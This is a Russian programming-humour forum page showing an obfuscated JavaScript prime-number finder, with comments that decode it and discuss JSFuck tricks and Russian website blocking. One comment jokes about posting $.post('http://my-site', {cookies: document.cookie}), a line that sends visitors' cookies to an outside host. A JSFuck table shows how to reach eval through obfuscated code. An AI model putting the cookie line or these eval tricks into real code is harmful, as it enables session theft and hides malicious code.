Говнокод #17222 — JavaScript

JavaScript / Говнокод #17222

+161
1. 01
2. 02
3. 03
4. 04
5. 05
6. 06
7. 07
8. 08
9. 09
10. 10
11. 11
12. 12
13. 13
14. 14
15. 15
16. 16
17. 17
18. 18
```
function kevinTheNumberMentioner(_){
  l=[]
  /* mostly harmless --> */ with(l) {
  	
  	//Sorry about all this, my babel fish has a headache today...
  	for (ll=!+[]+!![];ll<_+(+!![]);ll++) {
  	  lll=+!![];
  	  while (ll%++lll);
  	  //I've got this terrible pain in all the semicolons down my right-hand side
  	  (ll==lll)&&push(ll);
  	}
  	forEach(alert);
  	
  }
  
  //You're really not going to like this...
  return [!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]];
}
```
Открыл твитор, а там - это.
```
http://arstechnica.com/information-technology/2014/11/holiday-reading-for-a-certain-sort-if-hemingway-wrote-javascript/
```
Запостил: Xom94ok, 30 Ноября 2014

Tweet
Комментарии (67) RSS
- bot 30.11.2014 01:39 # +5
  
  Говнокод #17222 возвращает 42.
  Нда...
  Ответить
  - Xom94ok 30.11.2014 01:46 # +3
    
    Это что получается, миссия говнокода завершена? o_O
    Ответить
    - bot 02.12.2014 00:12 # 0
      
      Кстати, очень не хватает кнопки [Выполнить].
      Ответить
      
      bormand 02.12.2014 07:11 # 0
      
      Скопируй в консольку браузера да выполни ;)
      
      http://ideone.com/fdVU1v
      Ответить
      
      1024-- 02.12.2014 09:40 # 0
      
      Набросал мелкую питушню:
      https://github.com/1024--/govnokod.ru-userscripts/blob/master/execjs.user.js
      Вот как она выглядит:
      http://s7.hostingkartinok.com/uploads/images/2014/12/23468c95ea94e220af9b765b8ca2d667.png
      Ответить
      
      bormand 02.12.2014 10:25 # +1
      
      Пойду запощу говнокод про $.post("http://my-site", {cookies: document.cookie;})
      Ответить
      
      1024-- 02.12.2014 10:42 # +1
      
      Можно ещё воспользоваться техникой из http://habrahabr.ru/post/243351/
      
      P.S. Скрипт жёстко пофиксил.
      Ответить
      
      bormand 02.12.2014 11:03 # +1
      
      > alert('Выполнять всякую хрень опасно!');
      > return false;
      Какой полезный скрипт...
      Ответить
      
      3.14159265 02.12.2014 14:46 # +1
      
      LOL. Я тоже был немного озадачен "фиксом".
      Хотя бы confirm.
      Ответить
      
      bormand 02.12.2014 11:16 # +1
      
      > техникой из <ссылка проверяется модератором>
      Сурово. Но декодер один хрен нужен, а его присутствие намекает на то, что тут что-то скрыто...
      Ответить
      
      1024-- 02.12.2014 11:38 # 0
      
      А в ништячке (в конце статьи) выражение очень похоже на строку. Если на ГК запороть подсветку кода, можно будет подумать, что автор кода скопировал то, что передавали в eval в каком-то скрипте.
      Ответить
      
      bot 03.12.2014 08:18 # +1
      
      Что-то случилось с гитхабом? (у меня со вчерашнего дня не отвечает)
      Ответить
      
      roman-kashitsyn 03.12.2014 08:34 # +1
      
      роспотребнадзор случился
      Ответить
      
      bot 03.12.2014 08:44 # 0
      
      Не. В общем, это местечковый провайдер хулиганит...
      PS. Вообще-то, таки случился.
      Ответить
      
      bormand 03.12.2014 08:46 # +1
      
      Да опять какой-то придурок репу про суициды залил, а далеко не все провайдеры могут банить по URL'ам.
      
      Ссылка на репозиторий удалена по требованию роскомнадзора
      Ответить
      
      bot 03.12.2014 08:50 # +4
      
      1024-- набросал мелкую петушню - гитхаб забанили...
      Ответить
      
      bormand 03.12.2014 08:56 # 0
      
      Блин, а забавные там стишки о суициде, ржали всем отделом ;)
      
      Ссылка удалена по требованию роскомнадзора
      Ответить
      
      3.14159265 03.12.2014 13:40 # 0
      
      Интересно если какое-нить конардо завайпает сайт suicide.txt ГК прикроют?
      Я думаю это неплохой дабл пиар.
      Ответить
      
      bormand 03.12.2014 13:50 # 0
      
      Страйко удалит...
      Ответить
      
      3.14159265 03.12.2014 13:53 # +1
      
      Удалить то удалит. Но перед этим попеарит сайт.
      Бугага.
      Роскомнадзор - мы предоставляем услуги по бесплатной раскрутке сайтов.
      Ответить
      
      inkanus-gray 03.12.2014 21:28 # 0
      
      > далеко не все провайдеры могут банить по URL'ам
      
      Особенно, когда ссылка начинается с https://
      Ответить
      
      bormand 03.12.2014 21:36 # 0
      
      Ну тот же ростелеком раньше MITM'ом страдал, подсовывая свой серт вместо настоящего.
      Ответить
      
      Анонимус 03.12.2014 22:26 # 0
      
      >>подсовывая свой серт вместо настоящего.
      Ебануться бляди! Одного этого факта достаточно чтоб больше ими никогда не пользоваться.
      Ответить
      
      guest 04.12.2014 01:32 # 0
      
      Ждем пруфа.
      Ответить
      
      guest 03.12.2014 22:27 # 0
      
      Пруф. Чем кончилось?
      Ответить
      
      bormand 04.12.2014 07:46 # 0
      
      Ну как я тебе пруф дам? Вчера 80 и 443й порты гитхаба тупо дропали пакеты. 22й работал нормально (т.е. git push/git pull вполне работали без всяких проксей).
      
      Несколько месяцев назад ради теста заходил на запрещенный сайт по https, и мозила вопила о том, что сертификат не соответствует домену. Если принять серт - выдавал обычную табличку о том, что доступ к сайту заблокирован по требованию соотв. органов. Об этом вроде бы на хабре и бордах несколько раз упоминали. Лень искать. На хабре, емнип, даже нажаловались на этот серт его издателю.
      Ответить
      
      bot 04.12.2014 01:03 # −1
      
      Ещё одна причина в пользу велосипедного шифрования. Надеюсь недавно запущенный отечественный Скайнет не болеет всякой подобной хуитой.
      Ответить
      
      Анонимус 04.12.2014 01:11 # +1
      
      еще одна причина поставить плагин который выдавал бы сразу же второе от корня имя в сертификате. И если там ростелегом -- сразу же болкировал бы сайт.
      Ответить
      
      guest 04.12.2014 01:33 # 0
      
      Если это действиетльно было так - долбать УЦ чтобы отозвал сертификат митмера, вроде для митма сертификаты не выдают? :)
      Ответить
      
      Анонимус 04.12.2014 02:08 # +1
      
      Вот кстати да.
      
      Ну тут одно из двух: или юзер поставил МИТМовый серт в доверенные, или тафт с верисайном продались дьяволу и выдали ростелегому серт на домен, коий им не принадлжыт.
      
      Так как оба варианта маловероятны, реквестую Борманда в тред: нехай разъяснит детали
      Ответить
      
      bot 04.12.2014 01:44 # −1
      
      сатиристический_рассказ_о_продаже_оружия_одному_правителю_и_продаже_защиты_от_него_другому.txt
      к сожалению память уже не та
      Ответить
      
      bormand 04.12.2014 07:48 # 0
      
      Зачем плагин то? Тот же ФФ изкоробки на такие сайты не пускает, ибо имя сайта не соответствует имени домена. Так что, походу, попытка была неудачной и они от этой ебанутой идеи отказались.
      Ответить
  - 3.14159265 02.12.2014 14:49 # +3
    
    Чушь какая-то.
    
    +[]=0
    !(+[])=true
    true+true+true+true=4
    [!+[]+!+[]+!+[]+!+[]] + [!+[]+!+[]] = [4]+[2]
    И что тут смешного? Плакать надо.
    Ответить
    - Xom94ok 02.12.2014 19:36 # 0
      
      Спасибо за расшифровку для того, кто в танке. Мне подумалось, что расписав код по кругу, можно вызвать дьявола :)
      > Плакать надо.
      > > Если бы Хемингуэй писал на JavaScript
      Тут, похоже, не плакать надо, а вдумчиво дрочить медитировать над книгой ;)
      Ответить
      
      3.14159265 02.12.2014 20:53 # 0
      
      Мда. Думал что меня наоборот - заминусуют за копетанство.
      Ответить
      
      1024-- 02.12.2014 22:18 # 0
      
      Программист - это компромисс между оптимизационной ленью и желанием активно использовать мозг.
      В данном случае лень перевешивает.
      Ответить
      
      3.14159265 02.12.2014 22:25 # +1
      
      Так ладно что заметен паттерн: 4 раза и потом 2.
      Но ведь http://www.jsfuck.com/ известен в узких кругах.
      
      false => ![] true => !![] undefined => [][[]] NaN => +[![]] 0 => +[] 1 => +!+[] 2 => !+[]+!+[] 10 => [+!+[]]+[+[]] Array => [] Number => +[] String => []+[] Boolean => ![] Function => []["filter"] eval => []["filter"]["constructor"]( CODE )() window => []["filter"]["constructor"]("return this")()
      Ответить
      
      1024-- 02.12.2014 22:38 # 0
      
      > 10 => [+!+[]]+[+[]]
      Фу, читерство. И в обсуждаемом ГК тоже в конце строка, как будто лишнего плюса и скобочек жалко.
      
      P.S.
      > Function => []["filter"]
      []["filter"]["constructor"]
      Ответить
      
      Elvenfighter 03.12.2014 23:45 # +1
      
      Программирование на массивах.
      Ответить
      
      Анонимус 04.12.2014 02:09 # +1
      
      Кажется, у Ook, Brainfuck, и Whitespace появился достойный конкурент
      Ответить
      
      bormand 02.12.2014 22:25 # 0
      
      > while (ll%++lll);
      > (ll==lll)&&push(ll);
      Я вот по этой штуке предположил, что это что-то типа наивного поиска простых чисел. Но разбирать остальной говнокод с +[] было лень. Поэтому я тупо открыл статью, и узнал, что это действительно поиск простых чисел.
      Ответить
      
      3.14159265 02.12.2014 22:27 # 0
      
      Я там табличку добавил, схороните/напечатайте для быстрого парсинга подобного.
      Деобфускатор тут
      https://github.com/aemkei/jsfuck/blob/master/jsfuck.js
      
      Function => []["filter"]
      Тут они конечно затупили
      Я бы сделал []["join"] или даже []["pop"]
      Ответить
      
      bormand 02.12.2014 22:34 # 0
      
      А почему filter, а не map? map же короче.
      Ответить
      
      3.14159265 02.12.2014 22:39 # 0
      
      >а не map? map же короче.
      А я что дальше написал?
      Проблема в том что pop поддерживается большим числом браузеров чем map. (Пользователи старых ишаков тоже хотят запускать непонятные коды)
      Ответить
      
      bormand 02.12.2014 22:42 # 0
      
      > А я что дальше написал?
      Когда я писал про map - я этот апдейт еще не видел.
      
      Олсо - раз нам "constructor" один хер собирать, может можно поюзать []["constructor"]["constructor"], если как-то удастся его упихать в переменную?
      Ответить
      
      3.14159265 02.12.2014 22:44 # 0
      
      Мне еще нравится как они буквы достают
      (!![]+"")[0]==t
      (![]+"")[0]==f
      Можно было сделать так:
      (!![]+"").length+[!+[]+!+[]]==42
      Ответить
      
      bormand 02.12.2014 22:47 # 0
      
      Кстати, filter походу выбран из-за того, что его можно сложить из false, true и undefined! map и pop из скобок так просто не собрать, а у jsfuck жесткое ограничение на символы.
      Ответить
      
      3.14159265 02.12.2014 22:49 # 0
      
      >map и pop из скобок так просто не собрать, а у jsfuck жесткое ограничение на символы.
      Хм. Действительно. Хотя надо подумать можно ли в чарах.
      
      Не надо забывать про слова из typeof
      Ответить
      
      bormand 02.12.2014 22:51 # 0
      
      Но как мы его вызовем, если допустимые символы - []()+!
      Ответить
      
      3.14159265 02.12.2014 22:56 # 0
      
      Да. Забылся.
      А еще у строки есть методы. sup, sub, trim -
      Особенно хорош trim
      
      tri - есть и в filter и в trim
      fe = '(false+"")[0]','(true+"")[3]',
      'm' = '((+[])+"")[11]',
      Ответить
      
      3.14159265 02.12.2014 23:03 # 0
      
      Хотя не. Херь написал. Для m нужен (+[]) . constructor
      Ответить
      
      wvxvw 03.12.2014 01:08 # 0
      
      Если try-catch можно, то можно еще слов наковырять, но будет сильно браузеро-зависимо.
      Ответить
      
      1024-- 02.12.2014 22:35 # 0
      
      Поскольку я раньше видел подобные фокусы, то знал, что там может быть всё, что угодно, и для разгадки потребуется снять с кода три-четыре шкуры. Я посмотрел на всё это как на абстрактную картину и пошёл к своему коду, умолявшему меня вылечить его от тяжёлого бага.
      Ответить
- LispGovno 30.11.2014 18:52 # 0
  
  > (ll==lll)&&push(ll);
  Скриптовик скриптовика видит из далека
  Ответить
  - 3.14159265 02.12.2014 14:25 # +1
    
    > из далека
    потому стороной и обходит.
    издалека - откуда? наречие. пишется слитно
    Ответить
    - bormand 02.12.2014 14:54 # 0
      
      У нас тут и из далека смотрят, и в лом.
      Ответить
      
      3.14159265 02.12.2014 14:57 # 0
      
      > и в лом.
      А где было про лом?Ссылка на хабр не пропущенная модерацией - ловко придумано.
      Ответить
      
      bormand 02.12.2014 15:51 # 0
      
      http://www.govnokod.ru/16253#comment237868
      Ответить
    - roman-kashitsyn 02.12.2014 14:57 # +1
      
      из далвика
      Ответить
- someone 01.12.2014 06:57 # −1
  
  В JS есть with?
  Ответить
  - bot 01.12.2014 08:40 # 0
    
    С добрым утром.
    Ответить
  - 1024-- 01.12.2014 08:55 # +1
    
    with, goto и arguments.caller.arguments - секретные возможности языка, которые неплохо бы выпилить.
    Ответить
  - bormand 01.12.2014 11:30 # +2
    
    Эта говноконструкция там с рождения есть. Но она опасна и нинужна. Даже авторы языка это признали и запретили на strict'е.
    Ответить
    - guest 03.12.2014 22:28 # 0
      
      x нинужно значит, что x нет и от этого пригорает.
      Ответить
      
      1024-- 03.12.2014 22:43 # +1
      
      Что? Борманд страдает от того, что в C++ нет with? Какая новость, об этом должны знать все газеты!
      Ответить
  - Анонимус 02.12.2014 19:14 # +1
    
    12.10
    
    http://www.ecma-international.org/ecma-262/5.1/#sec-12.10
    
    Ответить
- Lokich 01.12.2014 12:55 # 0
  
  что это вообще такое?
  Ответить
Добавить комментарий
Ошибка компиляции комментария:

Гости могут высказаться только в понедельник, среду, четверг или воскресение
Семь раз отмерь — один отрежь, guest!

А не использовать ли нам bbcode?

[b]жирный[/b] — жирный

[i]курсив[/i] — курсив

[u]подчеркнутый[/u] — подчеркнутый

[s]перечеркнутый[/s] — перечеркнутый

[blink]мигающий[/blink] — мигающий

[color=red]цвет[/color] — цвет (подробнее)

[size=20]размер[/size] — размер (подробнее)

[code=<language>]some code[/code] (подробнее)

Проверочный код: *

Говнокод: по колено в коде.

JavaScript / Говнокод #17222

Комментарии (67) RSS

Добавить комментарий